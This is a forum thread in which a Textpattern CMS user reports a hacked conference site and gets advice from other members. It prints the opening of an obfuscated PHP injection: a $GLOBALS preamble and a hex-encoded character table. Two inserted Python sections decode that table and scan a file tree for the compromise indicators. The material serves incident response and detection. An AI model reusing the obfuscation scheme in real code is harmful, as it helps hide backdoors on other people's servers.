Textpattern CMS support forum

#1 2016-01-26 09:07:17

mario.paolucci
New Member
Registered: 2016-01-26
Posts: 8

Hacked website

Hello all,

I run Textpattern version 4.5.7 (r5900) for a conference. All of a sudden I started to get weird error messages. The diagnostics say that Textpattern files have been modified; opening them revealed some weird GLOBALS code insertion (example below) and some strange new files (example: general.php.suspected).

I have saved the whole structure for reference, then replaced all the modified files with clean ones. Of course this doesn’t address the vulnerability. What do you think, is this likely to be a security problem in my installation, or rather a security problem in the server machine?

I had removed the setup dir just after install, and checked for writable directories, but not much more than that. Suggestions and comments welcome.

 <?php $GLOBALS['ldc74582'];global$ldc74582;$ldc74582=$GLOBALS;$ldc74582['j709a']="\x7b\x3b\x70\x4c\x67\x45\x7d\x76\x59\xa\x2c\x3c\x28\x65\x38\x24\x48\x6c\x20\x42\x60\x5f\x34\x9\x5e\x52\x63\x74\x26\x3d\x30\x4b\x64\x77\x23\x47\x44\x71\x22\x2b\x69\x5d\x37\x5b\x58\x78\x4f\x25\x33\x21\x6d\x54\x50\x4a\x3f\x29\x72\x4d\x31\x4e\x57\x36\xd\x6e\x53\x41\x51\x7e\x5a\x6a\x43\x40\x62\x7c\x6b\x61\x7a\x2f\x79\x55\x66\x46\x27\x6f\x3e\x32\x5c\x56\x68\x75\x2a\x2d\x3a\x73\x39\x35\x2e\x49";$ldc74582[$ldc74582['j709a'][

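The `$GLOBALS['j709a']` assignment in the snippet above is a character table: 98 `\x` escapes which, decoded, are every printable ASCII character plus tab, newline and carriage return in shuffled order. Every later `$ldc74582['j709a'][i]` picks one character from that table, and concatenating such lookups spells out the names the code needs. The Python below is an added example, not code from the original post or from Textpattern; it decodes that table and shows the lookup in both directions. Note that PHP accepts one or two hex digits after `\x` (the sample has `\xa`, `\x9`, `\xd`), which Python's own escape decoding rejects. The index sequence for `eval` is constructed for illustration, because the posted copy is truncated before any lookup; it is not a claim about what the real file spelled.

```python
import re
import string

# The escaped alphabet exactly as it appears in the $GLOBALS['j709a'] assignment
# in the posted sample (the rest of that file is truncated in the post).
SAMPLE_ALPHABET_ESCAPED = (
    r"\x7b\x3b\x70\x4c\x67\x45\x7d\x76\x59\xa\x2c\x3c\x28\x65\x38\x24\x48\x6c\x20\x42"
    r"\x60\x5f\x34\x9\x5e\x52\x63\x74\x26\x3d\x30\x4b\x64\x77\x23\x47\x44\x71\x22\x2b"
    r"\x69\x5d\x37\x5b\x58\x78\x4f\x25\x33\x21\x6d\x54\x50\x4a\x3f\x29\x72\x4d\x31\x4e"
    r"\x57\x36\xd\x6e\x53\x41\x51\x7e\x5a\x6a\x43\x40\x62\x7c\x6b\x61\x7a\x2f\x79\x55"
    r"\x66\x46\x27\x6f\x3e\x32\x5c\x56\x68\x75\x2a\x2d\x3a\x73\x39\x35\x2e\x49"
)

# PHP double-quoted strings accept \x followed by ONE or two hex digits (\xa, \x9,
# \xd above). Python's codecs require exactly two, so decode with a regex instead
# of bytes.decode("unicode_escape"), which would raise on this sample.
PHP_HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")


def decode_php_hex_escapes(escaped):
    """Return the literal characters of a PHP double-quoted string made of \\x escapes."""
    return PHP_HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), escaped)


def covers_all_printable(alphabet):
    """True if the table holds every printable ASCII char plus \\t \\n \\r, each once."""
    wanted = set(string.printable) - {"\x0b", "\x0c"}   # drop VT and FF
    return len(alphabet) == len(wanted) and set(alphabet) == wanted


def spell(alphabet, indices):
    """What a chain of $x['j709a'][i] lookups concatenates to, one char per index."""
    return "".join(alphabet[i] for i in indices)


def indices_for(alphabet, text):
    """Reverse mapping: the indices an obfuscator would emit to spell `text`."""
    position = {ch: i for i, ch in enumerate(alphabet)}
    return [position[ch] for ch in text]


if __name__ == "__main__":
    table = decode_php_hex_escapes(SAMPLE_ALPHABET_ESCAPED)
    print(repr(table), len(table), covers_all_printable(table))
    # Constructed lookup sequence for illustration; the post's copy ends before
    # the real indices, so this is not what the actual sample spelled.
    demo = [13, 7, 75, 17]
    print(demo, "->", spell(table, demo))
    print("eval <-", indices_for(table, "eval"))
```

The practical use is triage rather than full deobfuscation: once the table is decoded, the index chains in the rest of such a file can be turned back into the function names and keys they build, which is what tells you whether the injected code is a mailer, a dropper or a backdoor.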

#2 2016-01-26 09:32:41

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,011

Re: Hacked website

Hi Mario, and welcome to the txp forum.

Do you have any other installations on your server (WordPress, stats software, forum)? Also, are you on a shared server?

I don’t know if you already have, but you should also change the user names and passwords for FTP, webmin, MySQL, the txp install, etc.


Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.


#3 2016-01-26 10:07:58

mario.paolucci
New Member
Registered: 2016-01-26
Posts: 8

Re: Hacked website

Thanks for your answer. Yes, the server is shared. I have requested a password change from the admin. No other installation under my user (but some directories are group-writable).

Is this kind of exploit common? Anything else I should “clean”?


#4 2016-01-26 11:03:26

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,011

Re: Hacked website

mario.paolucci wrote #297588:

Thanks for your answer. Yes, the server is shared. I have requested a password change from the admin. No other installation under my user (but some directories are group-writable).

Is this kind of exploit common? Anything else I should “clean”?

Txp has a very low percentage of sites being hacked, and it is normally due to other installs on the server, or to vulnerabilities in the server setup and other sites in a shared hosting environment.

One of our developers will possibly respond to this and offer more professional advice.



#5 2016-01-26 17:54:04

wet
Developer Emeritus
From: Schoerfling, Austria
Registered: 2005-06-06
Posts: 3,323

Re: Hacked website

Which version of PHP do you use?


#6 2016-01-26 19:50:10

ruud
Developer Emeritus
From: a galaxy far far away
Registered: 2006-06-04
Posts: 5,068

Re: Hacked website

Did you by any chance save copies of the modified files?
Do you have the ‘last modified’ timestamps of those files?
If so, does anything weird show up in the server log files at that time?


#7 2016-01-27 09:54:53

mario.paolucci
New Member
Registered: 2016-01-26
Posts: 8

Re: Hacked website

Thanks all for your attention! The PHP version is 5.3.3. I have a complete copy of all the hacked files. Two kinds: modified Textpattern files:
publish.php

And just new files:
javascript98.php

I can share the zip if there is a forensic interest in them. I don’t run the machine and don’t have access to the logs. For the PHP version and other details I attach the diagnostics:

Textpattern version: 4.5.7 (r5900)
Last update: 2015-09-17 16:10:24/2016-01-26 08:33:42
Document root:
$path_to_site:
Textpattern path:
Permanent link mode: section_id_title
upload_tmp_dir: /tmp
Temporary directory path:
Site URL: www.ssc2016.cnr.it
PHP version: 5.3.3
GD Graphics Library: bundled (2.0.34 compatible); supported formats: GIF, JPG, PNG.
Server TZ: America/Los_Angeles
Server local time: 2016-01-27 01:23:58
DST enabled?: 0
Automatically adjust DST setting?: 0
Time zone: Europe/Rome (3600)
MySQL: 5.1.73
Locale: en_GB.UTF-8
Server: Apache
Apache version: Apache
PHP server API: apache2handler
RFC 2616 headers:
Server OS: Linux 2.6.32-573.12.1.el6.x86_64
Active plugins: adi_menu-1.3.1
Admin-side theme: classic 4.5.7


#8 2016-01-27 20:05:12

ruud
Developer Emeritus
From: a galaxy far far away
Registered: 2006-06-04
Posts: 5,068

Re: Hacked website

I can’t figure out the first one, but the second one for the most part is an SMTP library and appears to be used to send email. Not sure if it attaches local files or uploaded files.

Without log files, I don’t think there’s much to investigate. Do you have logs in TXP enabled? Do they show anything unusual?


#9 2016-01-27 22:39:19

bici
Member
From: vancouver
Registered: 2004-02-24
Posts: 2,075

Re: Hacked website

One thing comes to mind: has anyone uploaded a .gif somewhere into your file space? I once had a malicious GIF placed into my /public_html/ directory, which was a virus.


…. texted postive


#10 2016-01-28 14:32:11

mario.paolucci
New Member
Registered: 2016-01-26
Posts: 8

Re: Hacked website

Thank you bici!

I went looking for GIFs and I found a whole directory – created today – full of them, under user 48, not me.

That definitely points in the direction of a cause other than anything Textpattern, as far as I understand.

I thank you all for your support and attention, and I guess the case can be closed.

Best

Mario

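Pulling the thread’s indicators into one check. The Python below is an added example, not code from the original posts or from Textpattern. It does what the diagnostics’ “files have been modified” notice does in principle: a SHA-256 manifest of a known-good tree is diffed against the live one, which answers ruud’s question about which files were modified or added even when an intruder resets timestamps. Separately, it flags the name-, owner- and content-based indicators mentioned above: a `.suspected` quarantine copy, a `$GLOBALS` indirection preamble like the one in the first post, a file with an image extension that contains a PHP open tag (bici’s malicious GIF), and a file owned by a uid other than the account’s (Mario’s “user 48”; on RHEL/CentOS, which the el6 kernel string in the diagnostics suggests this host runs, 48 is the default `apache` uid, meaning files written by the web server process rather than through the account). The fixture tree, file names and contents are constructed; only the preamble text is copied from the posted sample.

```python
import hashlib
import os
import re
import stat
import tempfile

# Indicators taken from the reports in this thread; the regexes are my own.
GLOBALS_PREAMBLE = re.compile(rb"\$GLOBALS\['(\w+)'\];global\$\1;\$\1=\$GLOBALS;")
PHP_OPEN_TAG = re.compile(rb"<\?php|<\?=")
IMAGE_EXTS = {".gif", ".jpg", ".jpeg", ".png"}


def hash_tree(root):
    """Map every regular file under root (relative path) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not stat.S_ISREG(os.lstat(path).st_mode):
                continue  # symlinks and specials need separate review
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            digests[os.path.relpath(path, root)] = h.hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Compare two hash_tree() results: new, modified and missing files, sorted."""
    changes = []
    for rel, digest in current.items():
        if rel not in baseline:
            changes.append((rel, "new"))
        elif baseline[rel] != digest:
            changes.append((rel, "modified"))
    for rel in baseline:
        if rel not in current:
            changes.append((rel, "missing"))
    return sorted(changes)


def content_findings(root, expected_uid=None):
    """Flag files by name, owner and content, independent of any baseline."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            if name.endswith(".suspected"):
                findings.append((rel, "quarantine suffix .suspected"))
            if expected_uid is not None and st.st_uid != expected_uid:
                findings.append((rel, "owned by uid %d" % st.st_uid))
            with open(path, "rb") as fh:
                head = fh.read(1 << 16)  # injections sit at the top of the file
            ext = os.path.splitext(name)[1].lower()
            if ext in IMAGE_EXTS and PHP_OPEN_TAG.search(head):
                findings.append((rel, "image extension but PHP inside"))
            m = GLOBALS_PREAMBLE.search(head)
            if m:
                findings.append((rel, "GLOBALS preamble var $" + m.group(1).decode()))
    return sorted(findings)


def build_sample_tree():
    """Constructed fixture: a clean tree, its baseline, then changes like those reported."""
    root = tempfile.mkdtemp(prefix="txp-triage-")
    os.makedirs(os.path.join(root, "textpattern"))
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "textpattern", "publish.php"), "wb") as fh:
        fh.write(b"<?php\n// clean core file (constructed)\n")
    with open(os.path.join(root, "images", "logo.gif"), "wb") as fh:
        fh.write(b"GIF89a" + b"\x00" * 32)  # harmless image stand-in
    baseline = hash_tree(root)
    # Simulated compromise: injected preamble (text from the sample in this thread),
    # a new PHP file, a quarantine copy, and PHP hiding behind a .gif name.
    with open(os.path.join(root, "textpattern", "publish.php"), "r+b") as fh:
        body = fh.read()
        fh.seek(0)
        fh.write(b"<?php $GLOBALS['ldc74582'];global$ldc74582;$ldc74582=$GLOBALS; ?>" + body)
    with open(os.path.join(root, "javascript98.php"), "wb") as fh:
        fh.write(b"<?php /* constructed stand-in for a dropped file */\n")
    with open(os.path.join(root, "textpattern", "general.php.suspected"), "wb") as fh:
        fh.write(b"<?php /* constructed quarantined copy */\n")
    with open(os.path.join(root, "images", "cache.gif"), "wb") as fh:
        fh.write(b"GIF89a<?php /* constructed: PHP behind an image name */\n")
    return root, baseline


if __name__ == "__main__":
    root, baseline = build_sample_tree()
    for item in diff_baseline(baseline, hash_tree(root)):
        print("baseline:", *item)
    own_uid = getattr(os, "getuid", lambda: None)()
    for item in content_findings(root, expected_uid=own_uid):
        print("content: ", *item)
```

Take the baseline from a fresh download of the same release, not from the live tree after cleaning, and keep the manifest somewhere the web server cannot write; the owner check is only meaningful against the uid the hosting account actually uses for uploads.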

#11 2016-01-28 19:12:58

bici
Member
From: vancouver
Registered: 2004-02-24
Posts: 2,075

Re: Hacked website

mario.paolucci wrote #297601:

Thank you bici!

I went looking for GIFs and I found a whole directory – created today – full of them, under user 48, not me.

That definitely points in the direction of a cause other than anything Textpattern, as far as I understand.

I thank you all for your support and attention, and I guess the case can be closed.

Best

Check with your ISP to see if there is a security issue with access. Also, if you use any PHP scripts, that is how they get in.



#12 2016-01-28 20:24:18

ruud
Developer Emeritus
From: a galaxy far far away
Registered: 2006-06-04
Posts: 5,068

Re: Hacked website

I’d recommend switching to a different hosting company. One that knows how to correctly setup a webserver so one hacked account doesn’t affect all the other customers on the server.

